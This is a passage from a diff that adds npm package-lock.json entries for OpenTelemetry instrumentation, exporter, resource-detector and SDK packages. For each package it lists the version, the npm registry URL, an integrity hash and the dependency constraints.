"node_modules/@opentelemetry/instrumentation-http/node_modules/semver": { + "version": "7.5.4", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", + "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", + "dependencies": { + 
"lru-cache": "^6.0.0" + }, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@opentelemetry/instrumentation-http/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/@opentelemetry/instrumentation-ioredis": { + "version": "0.35.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-ioredis/-/instrumentation-ioredis-0.35.1.tgz", + "integrity": "sha512-lixraoS9rs81783QRjQ56/S5KzVBllC+zs7UJuTGODi5Egn/YMGp5lNnlbkUxeJl9LMyADMiP7ZGpQtfKwdc3g==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/redis-common": "^0.36.1", + "@opentelemetry/semantic-conventions": "^1.0.0", + "@types/ioredis4": "npm:@types/ioredis@^4.28.10" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-knex": { + "version": "0.32.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-knex/-/instrumentation-knex-0.32.1.tgz", + "integrity": "sha512-s+5BtsYUendDTrWAxkr50X3+kb+sVffFzp4z5DC+aZt52P/kF85wm6GyC1mREvvhhK2UKrCq2yMVKD90z0FKsA==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-koa": { + "version": "0.36.0", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-koa/-/instrumentation-koa-0.36.0.tgz", + "integrity": "sha512-4VRvaFeLAnxG+BQr7pZyWyjsM6RdPWkrwsgZTLFYdI1yTpePoyParfz04vJKPMW55ZJ749g15K2dUy6gVUV41Q==", + "dependencies": { + "@opentelemetry/core": "^1.8.0", + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0", + "@types/koa": "2.13.8", + "@types/koa__router": "8.0.11" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-lru-memoizer": { + "version": "0.33.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-lru-memoizer/-/instrumentation-lru-memoizer-0.33.1.tgz", + "integrity": "sha512-1FFOlGTEigMWppEkv7o+IyeyWTXXpFAfmcFjJRph5m88RsotgzPLCnxaSeS0GMU7E8UJplusNmmsnu7jPJ2YqA==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-memcached": { + "version": "0.32.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-memcached/-/instrumentation-memcached-0.32.1.tgz", + "integrity": "sha512-laolY41/k6KHYnBQrWpnMlEK49/g8/OQBtvSiPdHiF46wW3eWpXmaTGMRksrRGUtyE+VMRhf7WIDRUYLZULP1g==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0", + "@types/memcached": "^2.2.6" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-mongodb": { + "version": "0.37.0", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-mongodb/-/instrumentation-mongodb-0.37.0.tgz", + "integrity": 
"sha512-Fwuwf7Fsx/F3QXtU6hbxU4D6DtT33YkAr0+fjtR7qTEcAU0YOxCZfy4tlX2jxjxR1ze8tKfaAWhXBxXwLMWT3g==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/sdk-metrics": "^1.9.1", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-mongoose": { + "version": "0.33.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-mongoose/-/instrumentation-mongoose-0.33.1.tgz", + "integrity": "sha512-IzYcEZSmlaOlkyACt8gTl0z3eEQafxzEAt/+W+FdNBiUdm81qpVx/1bpzJwSgIsgcLf27Dl5WsPmrSAi4+Bcng==", + "dependencies": { + "@opentelemetry/core": "^1.8.0", + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + "engines": { + "node": ">=14.0" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-mysql": { + "version": "0.34.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-mysql/-/instrumentation-mysql-0.34.1.tgz", + "integrity": "sha512-zQq7hN3ILm1vIJCGeKHRc4pTK8LOmkTt8oKWf0v+whFs7axieIhXZMoCqIBm6BigLy3Trg5iaKyuSrx7kO6q2g==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0", + "@types/mysql": "2.15.21" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-mysql2": { + "version": "0.34.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-mysql2/-/instrumentation-mysql2-0.34.1.tgz", + "integrity": "sha512-SPwgLI2H+gH+GP7b5cWQlFqO/7UeHvw6ZzFKxwLr4vy8wmxYF4aBMLc8qVO8bdXFHd114v0IzOIAvpG6sl/zYQ==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0", + "@opentelemetry/sql-common": "^0.40.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-nestjs-core": { + "version": "0.33.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-nestjs-core/-/instrumentation-nestjs-core-0.33.1.tgz", + "integrity": "sha512-Y5Khvp8ODA6TuDcZKAc63cYDeeZAA/n0ceF0pcVCJwA2NBeD0hmTrCJXES2cvt7wVbHV/SYCu7OpYDQkNjbBWw==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-net": { + "version": "0.32.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-net/-/instrumentation-net-0.32.1.tgz", + "integrity": "sha512-r9YC8fFDi+B/JiNfMn+vJaOpgdA83bQM3u4mW9mJi2hAI/LcvjJYPx4aTRLWAPSd/HRG/Olzdvx5LdWvzL8LHg==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-pg": { + "version": "0.36.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-pg/-/instrumentation-pg-0.36.1.tgz", + "integrity": "sha512-k8L7RSRTQ6e+DbHEXZB8Tmf/efkQnWKeClpZb3TEdb34Pvme4PmcpG2zb6JtM99nNrshNlVDLCZ90U3xDneTbw==", + "dependencies": { + "@opentelemetry/core": "^1.8.0", + 
"@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0", + "@opentelemetry/sql-common": "^0.40.0", + "@types/pg": "8.6.1", + "@types/pg-pool": "2.0.3" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-pino": { + "version": "0.34.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-pino/-/instrumentation-pino-0.34.1.tgz", + "integrity": "sha512-/FW/wxTshwwmiSE8KgVoWvfjxz5omKBdDbP0McKZk84V02lwwJk0m7+kc2cSOed5rk7iprpZolwO8a8AFVanNA==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-redis": { + "version": "0.35.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-redis/-/instrumentation-redis-0.35.1.tgz", + "integrity": "sha512-zY7eTzGyJCMX/0o04Q9yLy7gllf7Zh4s+g7Kv1d2cMLtTt9zGSlncqj49uNCnneywnpMNRUIwcmd+Ch1bQeh+g==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/redis-common": "^0.36.1", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-redis-4": { + "version": "0.35.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-redis-4/-/instrumentation-redis-4-0.35.1.tgz", + "integrity": "sha512-tQ07wvtjUbHSvvhPPvWyZjYTSzVBTpC746ro5szLnniodvxtKkmP/N+R9KyFXfyH7wwaLIR1Scgq3XSGSppt+Q==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/redis-common": "^0.36.1", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-restify": { + "version": "0.34.0", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-restify/-/instrumentation-restify-0.34.0.tgz", + "integrity": "sha512-KQZxg6aTaeDXk0NSjdY1Zd1N4BPnefFqOaTk/QuXElASwUGVwJESRvOVXfhtM+3sILbMccwSwPYwqSowYQn0LA==", + "dependencies": { + "@opentelemetry/core": "^1.8.0", + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-router": { + "version": "0.33.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-router/-/instrumentation-router-0.33.1.tgz", + "integrity": "sha512-nz8PvjYMQWFgR17Yc5Sj624CamhXP021mWaWfHx6RhI6o67sPt+DT5468yZJZV1gMnaOSQfiBkjWZ7AGQkRutw==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-socket.io": { + "version": "0.34.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-socket.io/-/instrumentation-socket.io-0.34.1.tgz", + "integrity": "sha512-v9US0hXJaY7dkKOC2/CMLB526wn9F3CQrkeVUidvSm+AxFBoYXKdAUJijdBPWT4PKY98/VjFHuZ3HSe4QD8zPA==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + "engines": { + "node": ">=14.0" + }, + 
"peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-tedious": { + "version": "0.6.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-tedious/-/instrumentation-tedious-0.6.1.tgz", + "integrity": "sha512-zwgLKmWtAn0XsMb98aMaI7gCawzPqpy+LOgGTlYmUdqSVYnzMAn4QKrx24Rrd5pgmzOEIbAWHlpN7pOc1eIqxA==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0", + "@types/tedious": "^4.0.6" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-winston": { + "version": "0.32.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-winston/-/instrumentation-winston-0.32.1.tgz", + "integrity": "sha512-wgXb2W2cbNdRQfXTH0jcnfbhlVPapmu13Wqhedj2pMpXS2aBnWAdvNFlArS6q84MEhzv3A4fVevjbwXa4uCzwQ==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@opentelemetry/instrumentation/node_modules/require-in-the-middle": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/require-in-the-middle/-/require-in-the-middle-7.2.0.tgz", + "integrity": "sha512-3TLx5TGyAY6AOqLBoXmHkNql0HIf2RGbuMgCDT2WO/uGVAPJs6h7Kl+bN6TIZGd9bWhWPwnDnTHGtW8Iu77sdw==", + "dependencies": { + "debug": "^4.1.1", + "module-details-from-path": "^1.0.3", + "resolve": "^1.22.1" + }, + "engines": { + "node": ">=8.6.0" + } + }, + "node_modules/@opentelemetry/instrumentation/node_modules/semver": { + "version": "7.5.4", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", + "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", + "dependencies": { + "lru-cache": "^6.0.0" + }, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@opentelemetry/instrumentation/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/@opentelemetry/otlp-exporter-base": { + "version": "0.41.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/otlp-exporter-base/-/otlp-exporter-base-0.41.2.tgz", + "integrity": "sha512-pfwa6d+Dax3itZcGWiA0AoXeVaCuZbbqUTsCtOysd2re8C2PWXNxDONUfBWsn+KgxAdi+ljwTjJGiaVLDaIEvQ==", + "dependencies": { + "@opentelemetry/core": "1.15.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.0.0" + } + }, + "node_modules/@opentelemetry/otlp-grpc-exporter-base": { + "version": "0.41.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/otlp-grpc-exporter-base/-/otlp-grpc-exporter-base-0.41.2.tgz", + "integrity": "sha512-OErK8dYjXG01XIMIpmOV2SzL9ctkZ0Nyhf2UumICOAKtgLvR5dG1JMlsNVp8Jn0RzpsKc6Urv7JpP69wzRXN+A==", + "dependencies": { + "@grpc/grpc-js": "^1.7.1", + "@opentelemetry/core": "1.15.2", + 
"@opentelemetry/otlp-exporter-base": "0.41.2", + "protobufjs": "^7.2.3" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.0.0" + } + }, + "node_modules/@opentelemetry/otlp-proto-exporter-base": { + "version": "0.41.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/otlp-proto-exporter-base/-/otlp-proto-exporter-base-0.41.2.tgz", + "integrity": "sha512-BxmEMiP6tHiFroe5/dTt9BsxCci7BTLtF7A6d4DKHLiLweWWZxQ9l7hON7qt/IhpKrQcAFD1OzZ1Gq2ZkNzhCw==", + "dependencies": { + "@opentelemetry/core": "1.15.2", + "@opentelemetry/otlp-exporter-base": "0.41.2", + "protobufjs": "^7.2.3" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.0.0" + } + }, + "node_modules/@opentelemetry/propagation-utils": { + "version": "0.30.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/propagation-utils/-/propagation-utils-0.30.1.tgz", + "integrity": "sha512-GCZg19gBSOTCeHvSCVy08WUyKAp2LyIRcRQPZk8MMAbmz8JWha3huBS9tNXjB4hYwRqW2SJOZzoYjt2P/BxvEw==", + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.0.0" + } + }, + "node_modules/@opentelemetry/propagator-aws-xray": { + "version": "1.3.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/propagator-aws-xray/-/propagator-aws-xray-1.3.1.tgz", + "integrity": "sha512-6fDMzFlt5r6VWv7MUd0eOpglXPFqykW8CnOuUxJ1VZyLy6mV1bzBlzpsqEmhx1bjvZYvH93vhGkQZqrm95mlrQ==", + "dependencies": { + "@opentelemetry/core": "^1.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.0.0" + } + }, + "node_modules/@opentelemetry/propagator-b3": { + "version": "1.15.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/propagator-b3/-/propagator-b3-1.15.2.tgz", + "integrity": "sha512-ZSrL3DpMEDsjD8dPt9Ze3ue53nEXJt512KyxXlLgLWnSNbe1mrWaXWkh7OLDoVJh9LqFw+tlvAhDVt/x3DaFGg==", + "dependencies": { + "@opentelemetry/core": "1.15.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": ">=1.0.0 <1.5.0" + } + }, + "node_modules/@opentelemetry/propagator-jaeger": { + "version": "1.15.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/propagator-jaeger/-/propagator-jaeger-1.15.2.tgz", + "integrity": "sha512-6m1yu7PVDIRz6BwA36lacfBZJCfAEHKgu+kSyukNwVdVjsTNeyD9xNPQnkl0WN7Rvhk8/yWJ83tLPEyGhk1wCQ==", + "dependencies": { + "@opentelemetry/core": "1.15.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": ">=1.0.0 <1.5.0" + } + }, + "node_modules/@opentelemetry/redis-common": { + "version": "0.36.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/redis-common/-/redis-common-0.36.1.tgz", + "integrity": "sha512-YjfNEr7DK1Ymc5H0bzhmqVvMcCs+PUEUerzrpTFdHfZxj3HpnnjZTIFKx/gxiL/sajQ8dxycjlreoYTVYKBXlw==", + "engines": { + "node": ">=14" + } + }, + "node_modules/@opentelemetry/resource-detector-alibaba-cloud": { + "version": "0.28.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/resource-detector-alibaba-cloud/-/resource-detector-alibaba-cloud-0.28.1.tgz", + "integrity": "sha512-0ucRgwid6bSAgYL5fiTkLh7aS9cPyz+Ijyv961SZbpMeIgVBvU931676xrdGNqlmuxavt24BrNUUWZ4XKq8ViA==", + "dependencies": { + "@opentelemetry/resources": "^1.0.0", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.0.0" + } + }, + "node_modules/@opentelemetry/resource-detector-aws": { + "version": "1.3.1", + "resolved": 
"https://registry.npmjs.org/@opentelemetry/resource-detector-aws/-/resource-detector-aws-1.3.1.tgz", + "integrity": "sha512-1n3U0ns0xlA8EIOMY1oEP5+5rZE/nfhIld6nw8T8PK4PkS3kAQb1ZCj3RXajs3qA+qWWIaEvCNREx3A0Ifyt3Q==", + "dependencies": { + "@opentelemetry/core": "^1.0.0", + "@opentelemetry/resources": "^1.0.0", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.0.0" + } + }, + "node_modules/@opentelemetry/resource-detector-container": { + "version": "0.3.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/resource-detector-container/-/resource-detector-container-0.3.1.tgz", + "integrity": "sha512-7zQASISRLmsaCKurvaoi7kTa0ab4iQEvPVfRo4k5RLSVi4puaCcC+2qOd6Fk4jEqNueevhyn2upGUeH+0EJ6yQ==", + "dependencies": { + "@opentelemetry/resources": "^1.0.0", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.0.0" + } + }, + "node_modules/@opentelemetry/resource-detector-gcp": { + "version": "0.29.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/resource-detector-gcp/-/resource-detector-gcp-0.29.1.tgz", + "integrity": "sha512-u5mB53I49m0cXQ97dgZlgEnNin9xqwl9au2sXmblHG9XS6PocGoAgAiXGYYvITWhR3ID5Ei2GyGoJDFdAtCrVA==", + "dependencies": { + "@opentelemetry/core": "^1.0.0", + "@opentelemetry/resources": "^1.0.0", + "@opentelemetry/semantic-conventions": "^1.0.0", + "gcp-metadata": "^5.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.0.0" + } + }, + "node_modules/@opentelemetry/resources": { + "version": "1.15.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/resources/-/resources-1.15.2.tgz", + "integrity": "sha512-xmMRLenT9CXmm5HMbzpZ1hWhaUowQf8UB4jMjFlAxx1QzQcsD3KFNAVX/CAWzFPtllTyTplrA4JrQ7sCH3qmYw==", + "dependencies": { + "@opentelemetry/core": "1.15.2", + "@opentelemetry/semantic-conventions": "1.15.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": ">=1.0.0 <1.5.0" + } + }, + "node_modules/@opentelemetry/sdk-logs": { + "version": "0.41.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/sdk-logs/-/sdk-logs-0.41.2.tgz", + "integrity": "sha512-smqKIw0tTW15waj7BAPHFomii5c3aHnSE4LQYTszGoK5P9nZs8tEAIpu15UBxi3aG31ZfsLmm4EUQkjckdlFrw==", + "dependencies": { + "@opentelemetry/core": "1.15.2", + "@opentelemetry/resources": "1.15.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": ">=1.4.0 <1.5.0", + "@opentelemetry/api-logs": ">=0.39.1" + } + }, + "node_modules/@opentelemetry/sdk-metrics": { + "version": "1.15.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/sdk-metrics/-/sdk-metrics-1.15.2.tgz", + "integrity": "sha512-9aIlcX8GnhcsAHW/Wl8bzk4ZnWTpNlLtud+fxUfBtFATu6OZ6TrGrF4JkT9EVrnoxwtPIDtjHdEsSjOqisY/iA==", + "dependencies": { + "@opentelemetry/core": "1.15.2", + "@opentelemetry/resources": "1.15.2", + "lodash.merge": "^4.6.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": ">=1.3.0 <1.5.0" + } + }, + "node_modules/@opentelemetry/sdk-node": { + "version": "0.41.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/sdk-node/-/sdk-node-0.41.2.tgz", + "integrity": "sha512-t3vaB5ajoXLtVFoL8TSoSgaVATmOyUfkIfBE4nvykm0dM2vQjMS/SUUelzR06eiPTbMPsr2UkevWhy2/oXy2vg==", + "dependencies": { + "@opentelemetry/api-logs": "0.41.2", + "@opentelemetry/core": "1.15.2", + "@opentelemetry/exporter-jaeger": "1.15.2", + 
"@opentelemetry/exporter-trace-otlp-grpc": "0.41.2", + "@opentelemetry/exporter-trace-otlp-http": "0.41.2", + "@opentelemetry/exporter-trace-otlp-proto": "0.41.2", + "@opentelemetry/exporter-zipkin": "1.15.2", + "@opentelemetry/instrumentation": "0.41.2", + "@opentelemetry/resources": "1.15.2", + "@opentelemetry/sdk-logs": "0.41.2", + "@opentelemetry/sdk-metrics": "1.15.2", + "@opentelemetry/sdk-trace-base": "1.15.2", + "@opentelemetry/sdk-trace-node": "1.15.2", + "@opentelemetry/semantic-conventions": "1.15.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": ">=1.3.0 <1.5.0" + } + }, + "node_modules/@opentelemetry/sdk-trace-base": { + "version": "1.15.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/sdk-trace-base/-/sdk-trace-base-1.15.2.tgz", + "integrity": "sha512-BEaxGZbWtvnSPchV98qqqqa96AOcb41pjgvhfzDij10tkBhIu9m0Jd6tZ1tJB5ZHfHbTffqYVYE0AOGobec/EQ==", + "dependencies": { + "@opentelemetry/core": "1.15.2", + "@opentelemetry/resources": "1.15.2", + "@opentelemetry/semantic-conventions": "1.15.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": ">=1.0.0 <1.5.0" + } + }, + "node_modules/@opentelemetry/sdk-trace-node": { + "version": "1.15.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/sdk-trace-node/-/sdk-trace-node-1.15.2.tgz", + "integrity": "sha512-5deakfKLCbPpKJRCE2GPI8LBE2LezyvR17y3t37ZI3sbaeogtyxmBaFV+slmG9fN8OaIT+EUsm1QAT1+z59gbQ==", + "dependencies": { + "@opentelemetry/context-async-hooks": "1.15.2", + "@opentelemetry/core": "1.15.2", + "@opentelemetry/propagator-b3": "1.15.2", + "@opentelemetry/propagator-jaeger": "1.15.2", + "@opentelemetry/sdk-trace-base": "1.15.2", + "semver": "^7.5.1" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": ">=1.0.0 <1.5.0" + } + }, + "node_modules/@opentelemetry/sdk-trace-node/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@opentelemetry/sdk-trace-node/node_modules/semver": { + "version": "7.5.4", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", + "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", + "dependencies": { + "lru-cache": "^6.0.0" + }, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@opentelemetry/sdk-trace-node/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/@opentelemetry/semantic-conventions": { + "version": "1.15.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/semantic-conventions/-/semantic-conventions-1.15.2.tgz", + "integrity": "sha512-CjbOKwk2s+3xPIMcd5UNYQzsf+v94RczbdNix9/kQh38WiQkM90sUOi3if8eyHFgiBjBjhwXrA7W3ydiSQP9mw==", + "engines": { + "node": ">=14" + } + }, + "node_modules/@opentelemetry/sql-common": { + "version": "0.40.0", + "resolved": "https://registry.npmjs.org/@opentelemetry/sql-common/-/sql-common-0.40.0.tgz", + "integrity": "sha512-vSqRJYUPJVjMFQpYkQS3ruexCPSZJ8esne3LazLwtCPaPRvzZ7WG3tX44RouAn7w4wMp8orKguBqtt+ng2UTnw==", + 
